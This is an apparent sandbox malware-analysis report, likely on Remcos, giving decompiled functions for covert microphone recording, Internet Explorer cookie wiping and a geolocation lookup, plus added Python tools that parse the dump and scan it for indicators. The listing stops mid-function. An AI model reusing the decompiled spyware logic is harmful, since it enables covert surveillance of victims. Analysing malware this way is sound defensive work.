                                                                      • Opcode ID: be546d5b80fd31850e4204c9f880793145af66d9c0a13aeee3ca9cb7c26e5121
                                                                      • Instruction ID: a235659a9f502468bc65f8e5151e7be7100ddd5279af5669b7fc15fe4553dffd
                                                                      • Opcode Fuzzy Hash: be546d5b80fd31850e4204c9f880793145af66d9c0a13aeee3ca9cb7c26e5121
                                                                      • Instruction Fuzzy Hash: 9151E670E002599FDF10CFA8D885AEEBBF4EF0A310F15416BE951E7291E7349941CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E00401CCB(void* __ebx, void* __edx, void* __edi, intOrPtr _a8) {
                                                                      				char _v84;
                                                                      				char _v112;
                                                                      				void* _v116;
                                                                      				char _v136;
                                                                      				void* _v140;
                                                                      				char _v160;
                                                                      				void* _v164;
                                                                      				char _v184;
                                                                      				void* _v188;
                                                                      				char _v204;
                                                                      				char _v208;
                                                                      				void* _v212;
                                                                      				char _v228;
                                                                      				char _v232;
                                                                      				char _v236;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t29;
                                                                      				intOrPtr _t43;
                                                                      				void* _t76;
                                                                      				void* _t79;
                                                                      
                                                                      				_t47 = __ebx;
                                                                      				_push(_t76);
                                                                      				E00401F46(__ebx,  &_v228);
                                                                      				_t84 = _a8 - 0x3c0;
                                                                      				if(_a8 == 0x3c0) {
                                                                      					E004016C7();
                                                                      					E004372A9( &_v84, 0x50, "%Y-%m-%d %H.%M", E004016BF());
                                                                      					E00402053(__ebx,  &_v204, __edx, _t79,  &_v84);
                                                                      					_push(L".wav");
                                                                      					_t29 = E00418385( &_v112,  &_v208);
                                                                      					E00401ED3( &_v232, _t31, _t76, E00402FD4(_t47,  &_v184, E00402F65( &_v160, E00402F32(__ebx,  &_v136, 0x46e0d8, _t79), 0x5c), __edi, _t79, _t84, _t29));
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      					E00401F98();
                                                                      					E00401A2D(E00401EC4( &_v236), 0x46da78);
                                                                      					waveInUnprepareHeader( *0x46dab0, 0x46da78, 0x20); // *0x46dab0 = HWAVEIN handle, 0x46da78 = global WAVEHDR, 0x20 = sizeof(WAVEHDR) on 32-bit
                                                                      					0x46da78->lpData = E00401F6B(0x46e0f0); // WAVEHDR.lpData (+0x00): the capture buffer
                                                                      					_t43 =  *0x46dab4; // 0x0
                                                                      					 *0x46da7c = _t43; // WAVEHDR.dwBufferLength (+0x04)
                                                                      					 *0x46da80 = 0; // WAVEHDR.dwBytesRecorded (+0x08)
                                                                      					 *0x46da84 = 0; // WAVEHDR.dwUser (+0x0c)
                                                                      					 *0x46da88 = 0; // WAVEHDR.dwFlags (+0x10)
                                                                      					 *0x46da8c = 0; // WAVEHDR.dwLoops (+0x14)
                                                                      					waveInPrepareHeader( *0x46dab0, 0x46da78, 0x20); // re-register the header and queue it for the next chunk of microphone audio
                                                                      					waveInAddBuffer( *0x46dab0, 0x46da78, 0x20);
                                                                      				}
                                                                      				return E00401EC9();
                                                                      			}

                                                                      [Instruction address column for E00401CCB: one address per decompiled line, 0x00401ccb to 0x00401e22]

                                                                      APIs
                                                                      • _strftime.LIBCMT ref: 00401D10
                                                                        • Part of subcall function 00401A2D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401A99
                                                                      • waveInUnprepareHeader.WINMM(0046DA78,00000020,00000000,?), ref: 00401DC2
                                                                      • waveInPrepareHeader.WINMM(0046DA78,00000020), ref: 00401E00
                                                                      • waveInAddBuffer.WINMM(0046DA78,00000020), ref: 00401E0F
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                      • String ID: %Y-%m-%d %H.%M$.wav
                                                                      • API String ID: 3809562944-3597965672
                                                                      • Opcode ID: 84bc6e54503e707830db59b7950651190d31527b3b6fb850da134365874809e9
                                                                      • Instruction ID: 6d34670a9c9501c55046bded0889d23817cdfc8ec21eae78461e7117aeba614b
                                                                      • Opcode Fuzzy Hash: 84bc6e54503e707830db59b7950651190d31527b3b6fb850da134365874809e9
                                                                      • Instruction Fuzzy Hash: 23318F71A1C3409BC314EB62DC56A9E77E8AB85308F00493EF545A21F2FF789909CB5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
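                                                                      The listing for E00401CCB rewrites a global WAVEHDR at 0x46da78 field by field before handing it back to the driver, so an analyst with the 0x400000 memory dump can read the recorder's state straight out of those bytes. The following is an added example, not code from the Joe Sandbox report or from the sample: it unpacks the 32-bit WAVEHDR layout from mmsystem.h at the addresses the listing uses (0x46da78 for the header, 0x46dab0 for the HWAVEIN handle, 0x46dab4 for the configured buffer length) and decodes dwFlags. The bytes it runs on are constructed here; the handle and pointer values in them are made up and only the layout and addresses come from the listing.

```python
import struct

# 32-bit WAVEHDR from mmsystem.h: eight DWORDs, 0x20 bytes. This is why the sample
# passes 0x20 as the size argument to waveInPrepareHeader / waveInAddBuffer.
WAVEHDR_FIELDS = ("lpData", "dwBufferLength", "dwBytesRecorded", "dwUser",
                  "dwFlags", "dwLoops", "lpNext", "reserved")
WAVEHDR_SIZE = 0x20

# dwFlags bits (mmsystem.h)
WHDR_FLAGS = {0x01: "WHDR_DONE", 0x02: "WHDR_PREPARED", 0x04: "WHDR_BEGINLOOP",
              0x08: "WHDR_ENDLOOP", 0x10: "WHDR_INQUEUE"}
WHDR_INQUEUE = 0x10

# Globals the decompiled E00401CCB touches (virtual addresses, image based at 0x400000)
WAVEHDR_VA = 0x46DA78   # header passed to waveInUnprepareHeader / waveInPrepareHeader / waveInAddBuffer
HWAVEIN_VA = 0x46DAB0   # *0x46dab0: the HWAVEIN handle
BUFLEN_VA = 0x46DAB4    # *0x46dab4: value copied into dwBufferLength


def _offset(region: bytes, region_base: int, va: int, size: int) -> int:
    """Translate a virtual address into an offset inside `region`, refusing out-of-range reads."""
    off = va - region_base
    if off < 0 or off + size > len(region):
        raise ValueError(f"VA {va:#x} (+{size:#x}) lies outside the supplied region")
    return off


def read_dword(region: bytes, region_base: int, va: int) -> int:
    return struct.unpack_from("<I", region, _offset(region, region_base, va, 4))[0]


def parse_wavehdr(region: bytes, region_base: int, va: int = WAVEHDR_VA) -> dict:
    """Unpack the WAVEHDR at `va` and decode its dwFlags bits."""
    off = _offset(region, region_base, va, WAVEHDR_SIZE)
    hdr = dict(zip(WAVEHDR_FIELDS, struct.unpack_from("<8I", region, off)))
    hdr["flags_decoded"] = [name for bit, name in WHDR_FLAGS.items() if hdr["dwFlags"] & bit]
    return hdr


def capture_state(region: bytes, region_base: int) -> dict:
    """Summarise the recorder's state the way an analyst reads it off the dump."""
    hdr = parse_wavehdr(region, region_base)
    buflen = read_dword(region, region_base, BUFLEN_VA)
    return {
        "hwavein": read_dword(region, region_base, HWAVEIN_VA),
        "configured_buffer_length": buflen,
        "header": hdr,
        # a header still queued with the driver means capture was in progress at dump time
        "recording_in_flight": bool(hdr["dwFlags"] & WHDR_INQUEUE),
        # after the writes in E00401CCB these two must agree; a mismatch means the
        # header was last touched by some other code path
        "buffer_length_matches_global": hdr["dwBufferLength"] == buflen,
    }


def build_constructed_region():
    """Constructed stand-in for the 0x50 bytes around 0x46da70; not data from the sample."""
    base = 0x46DA70
    region = bytearray(0x50)
    # lpData, dwBufferLength, dwBytesRecorded, dwUser, dwFlags (PREPARED|INQUEUE), dwLoops, lpNext, reserved
    hdr = struct.pack("<8I", 0x00500000, 0x2B110, 0, 0, 0x02 | 0x10, 0, 0, 0)
    region[WAVEHDR_VA - base:WAVEHDR_VA - base + WAVEHDR_SIZE] = hdr
    struct.pack_into("<I", region, HWAVEIN_VA - base, 0x0003B4C8)  # made-up handle value
    struct.pack_into("<I", region, BUFLEN_VA - base, 0x2B110)
    return bytes(region), base


if __name__ == "__main__":
    region, base = build_constructed_region()
    for key, value in capture_state(region, base).items():
        print(key, value)
```

                                                                      On a real dump, pass the bytes of the 0x400000 region with `region_base=0x400000`; the VA arithmetic is the same and the bounds check refuses to read past the end of the region instead of silently returning zeros.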

                                                                      C-Code - Quality: 80%
                                                                      			E0040A57D(void* __eflags) {
                                                                      				char _v28;
                                                                      				char _v52;
                                                                      				char _v76;
                                                                      				char _v340;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t17;
                                                                      				void* _t20;
                                                                      				int _t34;
                                                                      				void* _t40;
                                                                      				void* _t41;
                                                                      				char* _t42;
                                                                      				void* _t48;
                                                                      				char* _t55;
                                                                      				void* _t59;
                                                                      				void* _t61;
                                                                      				void* _t62;
                                                                      				void* _t63;
                                                                      
                                                                      				_t42 =  &_v28;
                                                                      				E0040209F(_t40, _t42);
                                                                      				_push(_t42);
                                                                      				_t41 = 0;
                                                                      				_t17 = E00410B1D( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies"); // 0x80000001 = HKEY_CURRENT_USER; the "Cookies" value is the per-user IE cookie directory, stored as REG_EXPAND_SZ (hence the ExpandEnvironmentStringsA call below)
                                                                      				_t63 = _t62 + 0xc;
                                                                      				E00401FA2( &_v28, 0x80000001, _t59, _t17);
                                                                      				E00401F98();
                                                                      				_t58 = 0x461084;
                                                                      				_t20 = E00405ADC(0x461084);
                                                                      				_t67 = _t20;
                                                                      				if(_t20 == 0) {
                                                                      					ExpandEnvironmentStringsA(E00401F6B( &_v28),  &_v340, 0x104); // resolve %VAR% references in the registry value (0x104 = MAX_PATH)
                                                                      					__eflags = PathFileExistsA( &_v340); // only proceed if the cookie directory actually exists
                                                                      					if(__eflags == 0) {
                                                                      						goto L1;
                                                                      					} else {
                                                                      						E00402053(0,  &_v52, 0x461084, _t61,  &_v340);
                                                                      						_t58 =  &_v52;
                                                                      						_t34 = E004187B1(E00401EC4(E00418385( &_v76,  &_v52)),  &_v52);
                                                                      						E00401EC9();
                                                                      						_t55 =  &_v52;
                                                                      						E00401F98();
                                                                      						__eflags = _t34;
                                                                      						if(__eflags == 0) {
                                                                      							_push(_t55);
                                                                      							_push(_t55);
                                                                      							__eflags = E0040A885();
                                                                      							if(__eflags != 0) {
                                                                      								_t41 = 1;
                                                                      								E00402053(1, _t63 - 0x18,  &_v52, _t61, "\n[IE cookies cleared!]");
                                                                      								E0040A863(1,  &_v52, _t61, __eflags);
                                                                      								goto L8;
                                                                      							}
                                                                      						} else {
                                                                      							_t48 = _t63 - 0x18;
                                                                      							_push("\n[IE cookies cleared!]");
                                                                      							goto L2;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					L1:
                                                                      					_t48 = _t63 - 0x18;
                                                                      					_push("\n[IE cookies not found]");
                                                                      					L2:
                                                                      					E00402053(_t41, _t48, _t58, _t61);
                                                                      					E0040A863(_t41, _t58, _t61, _t67);
                                                                      					_t41 = 1;
                                                                      					L8:
                                                                      				}
                                                                      				E00401F98();
                                                                      				return _t41;
                                                                      			}

                                                                      [Instruction address column for E0040A57D: one address per decompiled line, 0x0040a586 to 0x0040a696]

                                                                      APIs
                                                                        • Part of subcall function 00410B1D: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410B3F
                                                                        • Part of subcall function 00410B1D: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410B5E
                                                                        • Part of subcall function 00410B1D: RegCloseKey.ADVAPI32(?), ref: 00410B67
                                                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A5FF
                                                                      • PathFileExistsA.SHLWAPI(?), ref: 0040A60C
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                      • API String ID: 1133728706-4073444585
                                                                      • Opcode ID: 1ec087e9c9ca0ad8f87221c3579e362c13ac60d1150911bbf2b037922f98a7ec
                                                                      • Instruction ID: 4e5e9a138df1b669ebb71f0538ebc1637bd796b586e3e66ccfb6a03cfb0eb856
                                                                      • Opcode Fuzzy Hash: 1ec087e9c9ca0ad8f87221c3579e362c13ac60d1150911bbf2b037922f98a7ec
                                                                      • Instruction Fuzzy Hash: 7021A231A002196ACB04F7B2CC579EE7368AF11348F48056FB901B72D2EF7D594AC69A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
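                                                                      The "String ID" and "API ID" rows that the report attaches to E00401CCB and E0040A57D are the raw material for a quick triage check over other dumps from the same infection. The following scanner is an added example, not code from the Joe Sandbox report or from any Remcos tooling: it searches a dump for those exact strings and API names, in both their ANSI and UTF-16LE forms (the listing pushes L".wav" as a wide string), and only reports a category when both a string and an API indicator are present. The category names and the scoring rule are this example's own, and the input it runs on is constructed here, not bytes from the sample.

```python
# Indicator strings and API names as they appear in the listings for E00401CCB
# (microphone capture) and E0040A57D (IE cookie wipe). Heuristics for triage only;
# the category names are this example's own, not Joe Sandbox's.
INDICATORS = {
    "mic-capture": {
        "strings": [b"%Y-%m-%d %H.%M", b".wav"],
        "apis": [b"waveInUnprepareHeader", b"waveInPrepareHeader", b"waveInAddBuffer"],
    },
    "ie-cookie-wipe": {
        "strings": [b"[IE cookies cleared!]", b"[IE cookies not found]",
                    b"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders"],
        "apis": [b"ExpandEnvironmentStringsA", b"PathFileExistsA"],
    },
}


def _forms(needle: bytes):
    # Match the ANSI form and the UTF-16LE form; E00401CCB pushes L".wav" as a wide string.
    yield needle, "ansi"
    yield needle.decode("latin-1").encode("utf-16-le"), "utf-16le"


def _find_all(blob: bytes, needle: bytes):
    start = 0
    while (pos := blob.find(needle, start)) >= 0:
        yield pos
        start = pos + 1


def find_indicators(blob: bytes, image_base: int = 0x400000) -> list:
    """Return every indicator occurrence with its offset and the VA it maps to when
    the blob is an image-based dump (offset 0 == image_base)."""
    hits = []
    for category, table in INDICATORS.items():
        for kind, needles in table.items():
            for needle in needles:
                for form, encoding in _forms(needle):
                    for pos in _find_all(blob, form):
                        hits.append({
                            "category": category, "kind": kind,
                            "indicator": needle.decode("latin-1"),
                            "encoding": encoding, "offset": pos,
                            "va": image_base + pos,
                        })
    return hits


def triage(hits: list) -> list:
    """A category is reported only when both a string and an API indicator were seen;
    audio software or shell utilities legitimately use one set on its own."""
    seen = {}
    for h in hits:
        seen.setdefault(h["category"], set()).add(h["kind"])
    return sorted(cat for cat, kinds in seen.items() if {"strings", "apis"} <= kinds)


def constructed_dump() -> bytes:
    """Constructed bytes imitating an unpacked image: an import name table followed by
    a few data strings. Not bytes from the real sample."""
    imports = b"\x00".join([b"waveInAddBuffer", b"waveInPrepareHeader", b"ExpandEnvironmentStringsA",
                            b"PathFileExistsA", b"CreateFileW"]) + b"\x00"
    data = b"\x00".join([b"%Y-%m-%d %H.%M", ".wav".encode("utf-16-le"),
                         b"[IE cookies cleared!]", b"[IE cookies not found]",
                         b"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders"]) + b"\x00"
    return b"\x00" * 0x200 + imports + b"\x00" * 0x40 + data + b"\x00" * 0x40


if __name__ == "__main__":
    hits = find_indicators(constructed_dump())
    for h in hits:
        print(f"{h['va']:#010x} {h['category']:<15} {h['kind']:<8} {h['encoding']:<8} {h['indicator']}")
    print("triage:", triage(hits))
```

                                                                      Point `find_indicators` at the bytes of the 0x400000 region and the reported VAs can be compared directly against the `ref:` addresses in the API rows above; a packed or still-encrypted stage will show no hits, which is itself a signal to look for the unpacked copy instead.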

                                                                      C-Code - Quality: 90%
                                                                      			E004528BD(char* _a4, short* _a8) {
                                                                      				int _v8;
                                                                      				void* __ecx;
                                                                      				void* __esi;
                                                                      				short* _t10;
                                                                      				short* _t14;
                                                                      				int _t15;
                                                                      				short* _t16;
                                                                      				void* _t26;
                                                                      				int _t27;
                                                                      				void* _t29;
                                                                      				short* _t35;
                                                                      				short* _t39;
                                                                      				short* _t40;
                                                                      
                                                                      				_push(_t29);
                                                                      				if(_a4 != 0) {
                                                                      					_t39 = _a8;
                                                                      					__eflags = _t39;
                                                                      					if(__eflags != 0) {
                                                                      						_push(_t26);
                                                                      						E00444621(_t29, _t39, __eflags);
                                                                      						asm("sbb ebx, ebx");
                                                                      						_t35 = 0;
                                                                      						_t27 = _t26 + 1;
                                                                      						 *_t39 = 0;
                                                                      						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0); // first pass: cbMultiByte = -1 (NUL-terminated input), cchWideChar = 0 -> returns the wide-char count needed
                                                                      						_v8 = _t10;
                                                                      						__eflags = _t10;
                                                                      						if(_t10 != 0) {
                                                                      							_t40 = E004421F7(_t29, _t10 + _t10);
                                                                      							__eflags = _t40;
                                                                      							if(_t40 != 0) {
                                                                      								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8); // second pass: convert into the heap buffer of _t10 * 2 bytes allocated above
                                                                      								__eflags = _t15;
                                                                      								if(_t15 != 0) {
                                                                      									_t16 = _t40;
                                                                      									_t40 = 0;
                                                                      									_t35 = 1;
                                                                      									__eflags = 1;
                                                                      									 *_a8 = _t16;
                                                                      								} else {
                                                                      									E0043990B(GetLastError());
                                                                      								}
                                                                      							}
                                                                      							E004427C2(_t40);
                                                                      							_t14 = _t35;
                                                                      						} else {
                                                                      							E0043990B(GetLastError());
                                                                      							_t14 = 0;
                                                                      						}
                                                                      					} else {
                                                                      						 *((intOrPtr*)(E00439941())) = 0x16; // 0x16 = EINVAL: output pointer is NULL
                                                                      						E0043862C();
                                                                      						_t14 = 0;
                                                                      					}
                                                                      					return _t14;
                                                                      				}
                                                                      				 *((intOrPtr*)(E00439941())) = 0x16; // 0x16 = EINVAL: input string is NULL
                                                                      				E0043862C();
                                                                      				return 0;
                                                                      			}

                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 011221dc8e44fe761cbe672143520de27385273c876fa82623a1b2dc9ad6cc1c
                                                                      • Instruction ID: 139e041b0b33700c4d36bf1185964b58ea7e57f9df006e1bc172c4f7181bddef
                                                                      • Opcode Fuzzy Hash: 011221dc8e44fe761cbe672143520de27385273c876fa82623a1b2dc9ad6cc1c
                                                                      • Instruction Fuzzy Hash: 4E112BB26042157BDB202FB78C05A6B7A68EFC776AF10065FFC15C6352DAB888418669
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E00417B93(void* __ecx, void* __edx) {
                                                                      				WCHAR* _v36;
                                                                      				long _v80;
                                                                      				char _v88;
                                                                      				int _v92;
                                                                      				intOrPtr _v96;
                                                                      				void* _v100;
                                                                      				int _v104;
                                                                      				intOrPtr _v108;
                                                                      				void* __ebx;
                                                                      				void* __ebp;
                                                                      				int _t16;
                                                                      				void* _t24;
                                                                      				intOrPtr _t27;
                                                                      				void* _t32;
                                                                      				void* _t33;
                                                                      				void* _t35;
                                                                      				void* _t37;
                                                                      
                                                                      				_t32 = __edx;
                                                                      				_t25 = __ecx;
                                                                      				_t24 = __ecx;
                                                                      				E0040209F(__ecx, __ecx);
                                                                      				_push(0xffff);
                                                                      				_v36 = 0;
                                                                      				_t33 = E00438691(_t25);
                                                                      				_t37 = InternetOpenW(0, 1, 0, 0, 0);
                                                                      				_t35 = InternetOpenUrlW(_t37, L"http://geoplugin.net/json.gp", 0, 0, 0x80000000, 0);
                                                                      				do {
                                                                      					_v80 = _v80 & 0x00000000;
                                                                      					_t16 = InternetReadFile(_t35, _t33, 0xffff,  &_v80);
                                                                      					_t27 = _v96;
                                                                      					_v92 = _t16;
                                                                      					_t40 = _t27;
                                                                      					if(_t27 != 0) {
                                                                      						L00403336(E00402077(_t24,  &_v88, _t32, _t37, _t40, _t33, _t27));
                                                                      						E00401F98();
                                                                      						_t27 = _v108;
                                                                      						_t16 = _v104;
                                                                      					}
                                                                      				} while (_t16 == 1 && _t27 != 0);
                                                                      				InternetCloseHandle(_t35);
                                                                      				InternetCloseHandle(_t37);
                                                                      				L0043868C(_t33);
                                                                      				return _t24;
                                                                      			}

                                                                      APIs
                                                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417BBA
                                                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 00417BD0
                                                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 00417BE9
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00417C2F
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00417C32
                                                                      Strings
                                                                      • http://geoplugin.net/json.gp, xrefs: 00417BCA
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Internet$CloseHandleOpen$FileRead
                                                                      • String ID: http://geoplugin.net/json.gp
                                                                      • API String ID: 3121278467-91888290
                                                                      • Opcode ID: bdd3461025a07f4ab0c6adfcab2befc2b025bc62e3f9970a7a9e01657d32a828
                                                                      • Instruction ID: a985d038e5e821fb03fe24fa03f10acd68b0a5cf2d9b78d649052a39aa07e125
                                                                      • Opcode Fuzzy Hash: bdd3461025a07f4ab0c6adfcab2befc2b025bc62e3f9970a7a9e01657d32a828
                                                                      • Instruction Fuzzy Hash: 4611C8312093127BD224AF169C49DAB7FECEF85769F00043EF905A2191DB6C9844C6B9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0044CC6B(intOrPtr _a4) {
                                                                      				void* _t18;
                                                                      				intOrPtr _t45;
                                                                      
                                                                      				_t45 = _a4;
                                                                      				if(_t45 != 0) {
                                                                      					E0044C9B2(_t45, 7);
                                                                      					_t2 = _t45 + 0x1c; // 0x26
                                                                      					E0044C9B2(_t2, 7);
                                                                      					_t3 = _t45 + 0x38; // 0x42
                                                                      					E0044C9B2(_t3, 0xc);
                                                                      					_t4 = _t45 + 0x68; // 0x72
                                                                      					E0044C9B2(_t4, 0xc);
                                                                      					_t5 = _t45 + 0x98; // 0xa2
                                                                      					E0044C9B2(_t5, 2);
                                                                      					E004427C2( *((intOrPtr*)(_t45 + 0xa0)));
                                                                      					E004427C2( *((intOrPtr*)(_t45 + 0xa4)));
                                                                      					E004427C2( *((intOrPtr*)(_t45 + 0xa8)));
                                                                      					_t9 = _t45 + 0xb4; // 0xbe
                                                                      					E0044C9B2(_t9, 7);
                                                                      					_t10 = _t45 + 0xd0; // 0xda
                                                                      					E0044C9B2(_t10, 7);
                                                                      					_t11 = _t45 + 0xec; // 0xf6
                                                                      					E0044C9B2(_t11, 0xc);
                                                                      					_t12 = _t45 + 0x11c; // 0x126
                                                                      					E0044C9B2(_t12, 0xc);
                                                                      					_t13 = _t45 + 0x14c; // 0x156
                                                                      					E0044C9B2(_t13, 2);
                                                                      					E004427C2( *((intOrPtr*)(_t45 + 0x154)));
                                                                      					E004427C2( *((intOrPtr*)(_t45 + 0x158)));
                                                                      					E004427C2( *((intOrPtr*)(_t45 + 0x15c)));
                                                                      					return E004427C2( *((intOrPtr*)(_t45 + 0x160)));
                                                                      				}
                                                                      				return _t18;
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 0044C9B2: _free.LIBCMT ref: 0044C9DB
                                                                      • _free.LIBCMT ref: 0044CCB9
                                                                        • Part of subcall function 004427C2: HeapFree.KERNEL32(00000000,00000000,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A), ref: 004427D8
                                                                        • Part of subcall function 004427C2: GetLastError.KERNEL32(0000000A,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A,0000000A), ref: 004427EA
                                                                      • _free.LIBCMT ref: 0044CCC4
                                                                      • _free.LIBCMT ref: 0044CCCF
                                                                      • _free.LIBCMT ref: 0044CD23
                                                                      • _free.LIBCMT ref: 0044CD2E
                                                                      • _free.LIBCMT ref: 0044CD39
                                                                      • _free.LIBCMT ref: 0044CD44
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 1b44e874dceb31798a0f9e41914d974621cbef83765b8e07f2035fdd4be1358a
                                                                      • Instruction ID: 0cdbdbbf2addcad117c93b4af5572a357e99c5b513e924f7da436f6b735f60b6
                                                                      • Opcode Fuzzy Hash: 1b44e874dceb31798a0f9e41914d974621cbef83765b8e07f2035fdd4be1358a
                                                                      • Instruction Fuzzy Hash: 73114FB1642B04BAF560BBB2CC87FDB779CEF00704F844C1FB29A66052EA6DB9458754
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E0040ECED(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                      				void* _v8;
                                                                      				char _v12;
                                                                      				char _v24;
                                                                      				intOrPtr _v36;
                                                                      				intOrPtr* _t34;
                                                                      				void* _t39;
                                                                      				intOrPtr* _t42;
                                                                      				intOrPtr* _t44;
                                                                      
                                                                      				E00431C0B( &_v12, 0);
                                                                      				_t39 =  *0x46fdac;
                                                                      				_v8 = _t39;
                                                                      				_t42 = E0040BBB2(_a4, E0040BAE1(0x46ffa0));
                                                                      				if(_t42 != 0) {
                                                                      					L5:
                                                                      					E00431C63( &_v12);
                                                                      					return _t42;
                                                                      				} else {
                                                                      					if(_t39 == 0) {
                                                                      						__eflags = E0040EDB1(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
                                                                      						if(__eflags == 0) {
                                                                      							_t9 =  &_v24; // 0x40e664
                                                                      							_t34 = _t9;
                                                                      							E0040B9AD(_t34);
                                                                      							_t10 =  &_v24; // 0x40e664
                                                                      							E00435A36(_t10, 0x46969c);
                                                                      							asm("int3");
                                                                      							_push(_t42);
                                                                      							_t44 = _t34;
                                                                      							E0040B8A7(_t34, _v36);
                                                                      							 *_t44 = 0x4552d0;
                                                                      							return _t44;
                                                                      						} else {
                                                                      							_t42 = _v8;
                                                                      							 *0x46fdac = _t42;
                                                                      							 *((intOrPtr*)( *_t42 + 4))();
                                                                      							E00431E1C(__eflags, _t42);
                                                                      							goto L5;
                                                                      						}
                                                                      					} else {
                                                                      						_t42 = _t39;
                                                                      						goto L5;
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040ECFA
                                                                      • int.LIBCPMT ref: 0040ED0D
                                                                        • Part of subcall function 0040BAE1: std::_Lockit::_Lockit.LIBCPMT ref: 0040BAF2
                                                                        • Part of subcall function 0040BAE1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BB0C
                                                                      • std::_Facet_Register.LIBCPMT ref: 0040ED4D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040ED56
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040ED74
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                      • String ID: d@
                                                                      • API String ID: 2536120697-3443089334
                                                                      • Opcode ID: 34f1fb9562de7cf1d4cf39434dbbd2c72b799665a8e84ee754ab694f2ae99334
                                                                      • Instruction ID: c88102f2fc14dc4e949a375741808ed2cb2f2b99988b4f8521d55b5ae153e81e
                                                                      • Opcode Fuzzy Hash: 34f1fb9562de7cf1d4cf39434dbbd2c72b799665a8e84ee754ab694f2ae99334
                                                                      • Instruction Fuzzy Hash: 0811C132900115ABCB10BBA6E84189EBB78DF84324F10457FF845A72E1EB789E018BCD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E00436C97(void* __ecx) {
                                                                      				void* _t4;
                                                                      				void* _t11;
                                                                      				void* _t16;
                                                                      				long _t25;
